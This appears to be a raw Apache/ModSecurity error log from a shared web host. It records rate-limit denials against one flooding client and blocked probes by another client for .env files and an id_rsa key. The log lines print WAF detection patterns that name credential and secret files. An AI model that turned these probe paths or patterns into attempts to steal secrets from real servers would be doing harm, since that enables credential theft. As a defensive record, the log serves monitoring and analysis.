[Tue May 26 19:54:18.406429 2026] [security2:error] [pid 86490:tid 86743] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtEVZMwN0DpLVWo6K5nQAAAQA"]
[Tue May 26 19:54:18.431404 2026] [security2:error] [pid 86490:tid 86745] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtEVZMwN0DpLVWo6K5wQAAAQI"]
[Tue May 26 19:54:18.443213 2026] [security2:error] [pid 86490:tid 86704] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtEVZMwN0DpLVWo6K5xwAAANk"]
[Tue May 26 19:54:18.445163 2026] [security2:error] [pid 86490:tid 86704] [client 185.177.72.53:35070] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/backend/site/.env"] [unique_id "ahWtElZMwN0DpLVWo6K6LQAAANk"]
[Tue May 26 19:54:18.447197 2026] [security2:error] [pid 93576:tid 93770] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtEWDRMqfxdEDkoszPBAAAADo"]
[Tue May 26 19:54:18.449058 2026] [security2:error] [pid 86490:tid 86666] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtEVZMwN0DpLVWo6K5tgAAALM"]
[Tue May 26 19:54:18.452497 2026] [security2:error] [pid 86490:tid 86721] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtEVZMwN0DpLVWo6K5wgAAAOo"]
[Tue May 26 19:54:18.453372 2026] [security2:error] [pid 86490:tid 86687] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtEVZMwN0DpLVWo6K5ogAAAMg"]
[Tue May 26 19:54:18.456432 2026] [security2:error] [pid 86490:tid 86673] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtEVZMwN0DpLVWo6K5swAAALo"]
[Tue May 26 19:54:18.457195 2026] [security2:error] [pid 93868:tid 94363] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtEUqK9k_ZUB2Vp25HlAAAAfg"]
[Tue May 26 19:54:18.457279 2026] [security2:error] [pid 86490:tid 86739] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtEVZMwN0DpLVWo6K5yAAAAPw"]
[Tue May 26 19:54:18.461817 2026] [security2:error] [pid 86490:tid 86729] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtEVZMwN0DpLVWo6K5wwAAAPI"]
[Tue May 26 19:54:18.477800 2026] [security2:error] [pid 86490:tid 86716] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtEVZMwN0DpLVWo6K5tAAAAOU"]
[Tue May 26 19:54:18.480318 2026] [security2:error] [pid 86490:tid 86680] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtEVZMwN0DpLVWo6K51wAAAME"]
[Tue May 26 19:54:18.484532 2026] [security2:error] [pid 93868:tid 94325] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtEUqK9k_ZUB2Vp25HlwAAAdI"]
[Tue May 26 19:54:18.610484 2026] [qos:error] [pid 86490:tid 86709] [client 45.148.10.120:0] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=50.87.254.159, id=ahWtElZMwN0DpLVWo6K6aQAAAN4
[Tue May 26 19:54:18.622519 2026] [qos:error] [pid 86490:tid 86621] [client 45.148.10.120:35078] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtElZMwN0DpLVWo6K6bQAAAIY
[Tue May 26 19:54:18.624088 2026] [qos:error] [pid 86490:tid 86680] [client 45.148.10.120:34796] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtElZMwN0DpLVWo6K6bgAAAME
[Tue May 26 19:54:18.625403 2026] [qos:error] [pid 86490:tid 86689] [client 45.148.10.120:34842] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtElZMwN0DpLVWo6K6bwAAAMo
[Tue May 26 19:54:18.625706 2026] [qos:error] [pid 86490:tid 86641] [client 45.148.10.120:34880] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtElZMwN0DpLVWo6K6cAAAAJo
[Tue May 26 19:54:18.625868 2026] [qos:error] [pid 86490:tid 86656] [client 45.148.10.120:35208] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtElZMwN0DpLVWo6K6cQAAAKk
[Tue May 26 19:54:18.626313 2026] [qos:error] [pid 86490:tid 86719] [client 45.148.10.120:35222] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtElZMwN0DpLVWo6K6cgAAAOg
[Tue May 26 19:54:18.628008 2026] [qos:error] [pid 86490:tid 86664] [client 45.148.10.120:34834] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtElZMwN0DpLVWo6K6cwAAALE
[Tue May 26 19:54:18.638717 2026] [qos:error] [pid 86490:tid 86686] [client 45.148.10.120:34934] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtElZMwN0DpLVWo6K6dAAAAMc
[Tue May 26 19:54:18.640497 2026] [qos:error] [pid 86490:tid 86667] [client 45.148.10.120:34866] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtElZMwN0DpLVWo6K6dQAAALQ
[Tue May 26 19:54:18.679036 2026] [security2:error] [pid 86490:tid 86696] [client 66.249.66.196:56880] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.kingsclubmembership.com"] [uri "/index.php"] [unique_id "ahWtElZMwN0DpLVWo6K6EgAAANE"]
[Tue May 26 19:54:18.763866 2026] [qos:error] [pid 86490:tid 86725] [client 45.148.10.120:35326] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtElZMwN0DpLVWo6K6egAAAO4
[Tue May 26 19:54:18.773340 2026] [qos:error] [pid 86490:tid 86659] [client 45.148.10.120:35078] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtElZMwN0DpLVWo6K6fAAAAKw
[Tue May 26 19:54:18.773675 2026] [qos:error] [pid 86490:tid 86629] [client 45.148.10.120:34880] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtElZMwN0DpLVWo6K6fQAAAI4
[Tue May 26 19:54:18.774491 2026] [qos:error] [pid 86490:tid 86659] [client 45.148.10.120:34796] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtElZMwN0DpLVWo6K6fgAAAKw
[Tue May 26 19:54:18.775273 2026] [qos:error] [pid 86490:tid 86695] [client 45.148.10.120:35208] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtElZMwN0DpLVWo6K6fwAAANA
[Tue May 26 19:54:18.777024 2026] [qos:error] [pid 86490:tid 86709] [client 45.148.10.120:35222] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtElZMwN0DpLVWo6K6gAAAAN4
[Tue May 26 19:54:18.777216 2026] [qos:error] [pid 86490:tid 86716] [client 45.148.10.120:34842] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtElZMwN0DpLVWo6K6gQAAAOU
[Tue May 26 19:54:18.782787 2026] [qos:error] [pid 86490:tid 86655] [client 45.148.10.120:34834] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtElZMwN0DpLVWo6K6ggAAAKg
[Tue May 26 19:54:18.792161 2026] [qos:error] [pid 86490:tid 86700] [client 45.148.10.120:34934] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtElZMwN0DpLVWo6K6gwAAANU
[Tue May 26 19:54:18.792844 2026] [qos:error] [pid 86490:tid 86651] [client 45.148.10.120:34866] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtElZMwN0DpLVWo6K6hAAAAKQ
[Tue May 26 19:54:18.923937 2026] [qos:error] [pid 86490:tid 86680] [client 45.148.10.120:35078] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtElZMwN0DpLVWo6K6hQAAAME
[Tue May 26 19:54:18.925100 2026] [qos:error] [pid 86490:tid 86621] [client 45.148.10.120:34880] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtElZMwN0DpLVWo6K6hgAAAIY
[Tue May 26 19:54:18.926796 2026] [qos:error] [pid 86490:tid 86689] [client 45.148.10.120:35208] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtElZMwN0DpLVWo6K6hwAAAMo
[Tue May 26 19:54:18.928576 2026] [qos:error] [pid 86490:tid 86641] [client 45.148.10.120:35222] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtElZMwN0DpLVWo6K6iAAAAJo
[Tue May 26 19:54:18.929163 2026] [qos:error] [pid 86490:tid 86656] [client 45.148.10.120:34796] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtElZMwN0DpLVWo6K6iQAAAKk
[Tue May 26 19:54:18.933936 2026] [qos:error] [pid 86490:tid 86686] [client 45.148.10.120:35326] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtElZMwN0DpLVWo6K6iwAAAMc
[Tue May 26 19:54:18.934725 2026] [qos:error] [pid 86490:tid 86667] [client 45.148.10.120:34834] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtElZMwN0DpLVWo6K6jQAAALQ
[Tue May 26 19:54:18.935079 2026] [qos:error] [pid 86490:tid 86647] [client 45.148.10.120:34842] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtElZMwN0DpLVWo6K6jgAAAKA
[Tue May 26 19:54:18.944076 2026] [qos:error] [pid 86490:tid 86627] [client 45.148.10.120:34866] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtElZMwN0DpLVWo6K6jwAAAIw
[Tue May 26 19:54:18.946300 2026] [qos:error] [pid 86490:tid 86696] [client 45.148.10.120:34934] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtElZMwN0DpLVWo6K6kAAAANE
[Tue May 26 19:54:19.073078 2026] [qos:error] [pid 86490:tid 86709] [client 45.148.10.120:34880] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtE1ZMwN0DpLVWo6K6kwAAAN4
[Tue May 26 19:54:19.074148 2026] [qos:error] [pid 86490:tid 86716] [client 45.148.10.120:35078] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtE1ZMwN0DpLVWo6K6lAAAAOU
[Tue May 26 19:54:19.075726 2026] [qos:error] [pid 86490:tid 86655] [client 45.148.10.120:35208] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtE1ZMwN0DpLVWo6K6lQAAAKg
[Tue May 26 19:54:19.079773 2026] [qos:error] [pid 86490:tid 86700] [client 45.148.10.120:34796] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtE1ZMwN0DpLVWo6K6lgAAANU
[Tue May 26 19:54:19.086786 2026] [qos:error] [pid 86490:tid 86651] [client 45.148.10.120:34842] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtE1ZMwN0DpLVWo6K6lwAAAKQ
[Tue May 26 19:54:19.088711 2026] [qos:error] [pid 86490:tid 86739] [client 45.148.10.120:35326] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtE1ZMwN0DpLVWo6K6mAAAAPw
[Tue May 26 19:54:19.090992 2026] [qos:error] [pid 86490:tid 86621] [client 45.148.10.120:34834] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtE1ZMwN0DpLVWo6K6mgAAAIY
[Tue May 26 19:54:19.091278 2026] [qos:error] [pid 86490:tid 86680] [client 45.148.10.120:35222] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtE1ZMwN0DpLVWo6K6mQAAAME
[Tue May 26 19:54:19.093150 2026] [security2:error] [pid 86490:tid 86680] [client 185.177.72.53:35070] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:id_(?:r|d)sa$|key\\\\.pem$|(?:myserver|private-?key)\\\\.key$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1291"] [id "350591"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access raw Private cryto keys"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/id_rsa"] [unique_id "ahWtE1ZMwN0DpLVWo6K6mwAAAME"]
[Tue May 26 19:54:19.095930 2026] [qos:error] [pid 86490:tid 86641] [client 45.148.10.120:34866] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtE1ZMwN0DpLVWo6K6nAAAAJo
[Tue May 26 19:54:19.101394 2026] [qos:error] [pid 86490:tid 86656] [client 45.148.10.120:34934] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtE1ZMwN0DpLVWo6K6nQAAAKk
[Tue May 26 19:54:19.221097 2026] [qos:error] [pid 86490:tid 86647] [client 45.148.10.120:34880] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtE1ZMwN0DpLVWo6K6ogAAAKA
[Tue May 26 19:54:19.227985 2026] [qos:error] [pid 86490:tid 86627] [client 45.148.10.120:35078] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtE1ZMwN0DpLVWo6K6owAAAIw
[Tue May 26 19:54:19.229248 2026] [qos:error] [pid 86490:tid 86696] [client 45.148.10.120:35208] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtE1ZMwN0DpLVWo6K6pAAAANE
[Tue May 26 19:54:19.229665 2026] [qos:error] [pid 86490:tid 86721] [client 45.148.10.120:34796] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtE1ZMwN0DpLVWo6K6pQAAAOo
[Tue May 26 19:54:19.239396 2026] [qos:error] [pid 86490:tid 86643] [client 45.148.10.120:34842] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtE1ZMwN0DpLVWo6K6pgAAAJw
[Tue May 26 19:54:19.241781 2026] [qos:error] [pid 86490:tid 86725] [client 45.148.10.120:35326] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtE1ZMwN0DpLVWo6K6pwAAAO4
[Tue May 26 19:54:19.242105 2026] [qos:error] [pid 86490:tid 86673] [client 45.148.10.120:35222] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtE1ZMwN0DpLVWo6K6qAAAALo
[Tue May 26 19:54:19.245246 2026] [qos:error] [pid 86490:tid 86681] [client 45.148.10.120:34834] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtE1ZMwN0DpLVWo6K6qgAAAMI
[Tue May 26 19:54:19.252844 2026] [security2:error] [pid 86490:tid 86629] [client 185.177.72.53:35070] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/portfolio-app/server/.env"] [unique_id "ahWtE1ZMwN0DpLVWo6K6qwAAAI4"]
[Tue May 26 19:54:19.255220 2026] [qos:error] [pid 86490:tid 86709] [client 45.148.10.120:34934] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtE1ZMwN0DpLVWo6K6rAAAAN4
[Tue May 26 19:54:19.256827 2026] [qos:error] [pid 86490:tid 86716] [client 45.148.10.120:34866] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtE1ZMwN0DpLVWo6K6rQAAAOU
[Tue May 26 19:54:19.285011 2026] [security2:error] [pid 86490:tid 86688] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtEVZMwN0DpLVWo6K5zAAAAMk"]
[Tue May 26 19:54:19.285203 2026] [security2:error] [pid 86490:tid 86632] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtEVZMwN0DpLVWo6K5zQAAAJE"]
[Tue May 26 19:54:19.292353 2026] [security2:error] [pid 86490:tid 86708] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtEVZMwN0DpLVWo6K5oAAAAN0"]
[Tue May 26 19:54:19.293962 2026] [security2:error] [pid 93868:tid 94285] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtEUqK9k_ZUB2Vp25HmwAAAao"]
[Tue May 26 19:54:19.308201 2026] [security2:error] [pid 93868:tid 94334] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtEUqK9k_ZUB2Vp25HpgAAAds"]
[Tue May 26 19:54:19.312846 2026] [security2:error] [pid 86490:tid 86671] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtEVZMwN0DpLVWo6K52AAAALg"]
[Tue May 26 19:54:19.315070 2026] [security2:error] [pid 93868:tid 94304] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtEUqK9k_ZUB2Vp25HnQAAAb0"]
[Tue May 26 19:54:19.320497 2026] [ssl:error] [pid 86490:tid 86631] [client 66.132.172.178:60846] AH02032: Hostname md-74.webhostbox.net (default host as no SNI was provided) and hostname mail.stockmarketanalysis.in provided via HTTP have no compatible SSL setup for policy 'secure'
[Tue May 26 19:54:19.336374 2026] [security2:error] [pid 93576:tid 93713] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtEWDRMqfxdEDkoszPDgAAAAE"]
[Tue May 26 19:54:19.339492 2026] [security2:error] [pid 93576:tid 93715] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtEmDRMqfxdEDkoszPHgAAAAM"]
[Tue May 26 19:54:19.341785 2026] [security2:error] [pid 86490:tid 86702] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtEVZMwN0DpLVWo6K5yQAAANc"]
[Tue May 26 19:54:19.352706 2026] [security2:error] [pid 86490:tid 86628] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtEVZMwN0DpLVWo6K52QAAAI0"]
[Tue May 26 19:54:19.356435 2026] [security2:error] [pid 93576:tid 93791] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtEmDRMqfxdEDkoszPIwAAAE8"]
[Tue May 26 19:54:19.357714 2026] [security2:error] [pid 93868:tid 94320] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtEUqK9k_ZUB2Vp25HngAAAc0"]
[Tue May 26 19:54:19.359016 2026] [security2:error] [pid 93868:tid 94357] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtEUqK9k_ZUB2Vp25HlgAAAfI"]
[Tue May 26 19:54:19.360687 2026] [security2:error] [pid 86490:tid 86741] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtElZMwN0DpLVWo6K6JwAAAP4"]
[Tue May 26 19:54:19.362275 2026] [security2:error] [pid 86490:tid 86677] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtElZMwN0DpLVWo6K6KwAAAL4"]
[Tue May 26 19:54:19.365256 2026] [security2:error] [pid 93576:tid 93784] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtEmDRMqfxdEDkoszPHQAAAEg"]
[Tue May 26 19:54:19.394134 2026] [security2:error] [pid 93868:tid 94370] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtEUqK9k_ZUB2Vp25HmQAAAf8"]
[Tue May 26 19:54:19.399870 2026] [security2:error] [pid 93576:tid 93723] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtEmDRMqfxdEDkoszPIAAAAAs"]
